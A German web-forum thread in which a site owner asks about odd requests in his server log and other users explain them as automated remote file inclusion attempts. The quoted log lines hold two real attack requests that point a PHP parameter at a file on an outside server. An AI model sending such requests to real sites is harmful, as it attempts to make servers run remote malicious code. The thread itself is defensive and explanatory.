nicht angemeldet
URL Erweiterung
0 0 
Auge
URL Erweiterung
Hi,
habe mal eine blöde Frage sehe in letzter Zeit immer wieder seltsame Seitenaufrufe in der Log Datei meiner Homepage:
z.B.
/meldungen.php?show=http://64.15.67.17/~artatgig/index.htm?
oder
/meldungen.php?show=http://64.15.67.17/~calebsbi/logo.jpg?
die "Erweiterung" (kenne den Fachbegriff nicht, sorry) nach show= ist nicht auf meinem Server und auch nicht bei meinen Links zu finden, also gehe ich davon aus, daß ein User das per Hand reingeschrieben hat - was kann er/sie damit bezwecken?
Habe auf google mal nach der "Erweiterung" gesucht und gesehen, daß da die unterschiedlichsten Seiten mit dieser "Erweiterung" zu finden sind.
Wenn man die Seite http://64.15.67.17/ aufruft bekommt man die Testseite eine Apache Servers.
Sollte ich mir darüber Sorgen machen - etwas dagegen unternehmen?
Kann das zu Problemen bei meiner Seite führen (wenn ich den Link wie oben angegeben in die Adresszeile meines Browsers setze bekomme ich eine "Error 404 Seite" zurückgegeben - denke mal das dies ok ist, oder?) - ist das ein Angriff??
Danke und Grüße,
Kermit
-
Grüße,
irgendwelche bots versuchen deine seite z uhacken und tasten sie nach den gängigen plattformen ab.
sofern du schutzmäßig alles richtig getan hast, brauchst du darauf nicht weiter zu achten.
mehr als ein dos wirds nciht ;P
MFG
bleicher -
Hallo
habe mal eine blöde Frage sehe in letzter Zeit immer wieder seltsame Seitenaufrufe in der Log Datei meiner Homepage:
z.B.
/meldungen.php?show=http://64.15.67.17/~artatgig/index.htm?
oder
/meldungen.php?show=http://64.15.67.17/~calebsbi/logo.jpg?die "Erweiterung" (kenne den Fachbegriff nicht, sorry) nach show= ...
show ist ein URL-Parameter und die angegebene URL ist dessen Wert.
... ist nicht auf meinem Server und auch nicht bei meinen Links zu finden, also gehe ich davon aus, daß ein User das per Hand reingeschrieben hat ...
Das kann auch ein Robot sein (was sogar recht wahrscheinlich ist), der versucht, die in der URL angagebenen Ressourcen auf deiner Seite anzuzeigen.
- was kann er/sie damit bezwecken?
Wahrscheinlich wird versucht, eine Sicherheitslücke eines oft benutzten Skripts auszunutzen, um in den angegebenen Ressourcen enthaltene Schadsoftware auf deinem Webspace auszuführen. Dabei ist für den mutmaßlichen Angreifer egal, ob du das unsichere Skript überhaupt benutzt, es handelt sich um einen Rundumschlag, bei dem davon ausgegangen wird, dass auf irgendwelchen der angegriffenen Domains das unsichere Skript läuft und der Angriff erfolgreich ist.
Sollte ich mir darüber Sorgen machen - etwas dagegen unternehmen?
Was willst du unternehmen?
Kann das zu Problemen bei meiner Seite führen (wenn ich den Link wie oben angegeben in die Adresszeile meines Browsers setze bekomme ich eine "Error 404 Seite" zurückgegeben - denke mal das dies ok ist, oder?) - ist das ein Angriff??
Ja und höchstwahrscheinlich.
Tschö, Auge